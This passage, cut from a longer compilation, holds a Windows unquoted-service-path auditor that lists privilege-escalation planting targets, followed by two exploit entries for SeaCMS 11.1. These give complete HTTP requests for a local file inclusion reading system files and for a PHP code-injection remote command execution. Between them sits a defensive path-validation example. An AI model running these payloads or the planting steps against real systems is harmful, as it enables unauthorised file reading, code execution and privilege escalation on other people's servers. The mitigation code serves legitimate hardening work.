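    """The condition the wmic/findstr one-liners filter for: a space in the
    image path and no leading double quote."""
    return " " in binary_path and not binary_path.startswith('"')


def hijack_candidates(binary_path):
    """Files Windows looks for, in order, before it reaches the real image.

    Each space-delimited prefix is tried; a prefix whose last path component
    has no extension gets .exe appended. The walk stops at the first prefix
    that already ends in .exe, which is the real image (anything after it is
    arguments, as in the PDF Complete entry's /startedbyscm:... switch).
    """
    tokens = binary_path.split(" ")
    candidates = []
    for k in range(1, len(tokens) + 1):
        candidate = " ".join(tokens[:k])
        if candidate.lower().endswith(".exe"):
            break
        if "." not in candidate.rsplit("\\", 1)[-1]:
            candidate += ".exe"
        candidates.append(candidate)
    return candidates


def audit(sc_qc_output):
    """(service name, account, unquoted?, paths an attacker would plant)."""
    f = parse_sc_qc(sc_qc_output)
    path = f.get("BINARY_PATH_NAME", "")
    unquoted = is_unquoted(path)
    return (f.get("SERVICE_NAME"), f.get("SERVICE_START_NAME"), unquoted,
            hijack_candidates(path) if unquoted else [])


if __name__ == "__main__":
    print(audit(SC_QC_SAMPLE))
```

audit(SC_QC_SAMPLE) reports the service as LocalSystem, unquoted, with C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\System.exe as the planting targets; the next step on the host is icacls on those three directories to see whether the current user can create files in any of them.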
-
Seacms 11.1 - 'file' Local File Inclusion
# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1

GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1

Vulnerable parameter: file
Payload: C:/windows/system.ini

The download action serves whatever file the parameter names; an absolute path (a Windows host in this test) returns any file the web server process can read.
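The request above works because the file parameter reaches the filesystem untouched. The block below is an added example written for this page, not SeaCMS code, of the confinement check a download handler needs: refuse absolute paths in every spelling (POSIX, drive letter, UNC), refuse any .. segment and NUL bytes, and only then join the cleaned relative path onto the directory the handler is allowed to serve. The check is done on the string before the filesystem is touched, so it behaves the same whether the host is Windows or Linux. The base directory and file names are constructed for the example.

```python
import posixpath
import re

DRIVE_RE = re.compile(r"^[A-Za-z]:")     # C:/..., c:\...


def resolve_download(base_dir, requested):
    """Map a user-supplied `file` value onto a path under base_dir.

    Returns the joined path, or None when the request must be refused.
    Both separator styles are normalised first so that ..\\..\\ and a UNC
    prefix (\\\\server\\share, which becomes //server/share) are caught by
    the same tests as their forward-slash forms.
    """
    if "\x00" in requested:                        # truncation tricks in C-level APIs
        return None
    value = requested.replace("\\", "/")
    if value.startswith("/") or DRIVE_RE.match(value):
        return None                                # absolute: POSIX, UNC or drive letter
    parts = [p for p in value.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return None                                # empty, or climbs out of base_dir
    return posixpath.join(base_dir, *parts)


if __name__ == "__main__":
    base = "/var/www/seacms/uploads"               # constructed for this example
    for candidate in ("logs/scan.txt", "C:/windows/system.ini", "../../etc/passwd"):
        print(repr(candidate), "->", resolve_download(base, candidate))
```

Two things the string check cannot do: it does not follow symlinks already inside base_dir (resolve the final path with os.path.realpath and confirm it still starts with the real base before opening), and it assumes the web layer has URL-decoded the parameter exactly once, which is where a %2e%2e sequence would otherwise hide. Serving files by an identifier looked up in a list the server built itself, as the scan action here appears to do, removes the user-supplied path altogether.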
-
Seacms 11.1 - 'ip and weburl' Remote Command Execution
# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1

POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1

v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F

Vulnerable parameter: ip
Payload (URL-decoded): ";phpinfo();//

The payload closes a double-quoted PHP string literal, appends a statement and comments out the rest of the line, which is the shape needed when the submitted value is written into a PHP source file that the application later includes; phpinfo() is the proof, and any other PHP runs the same way.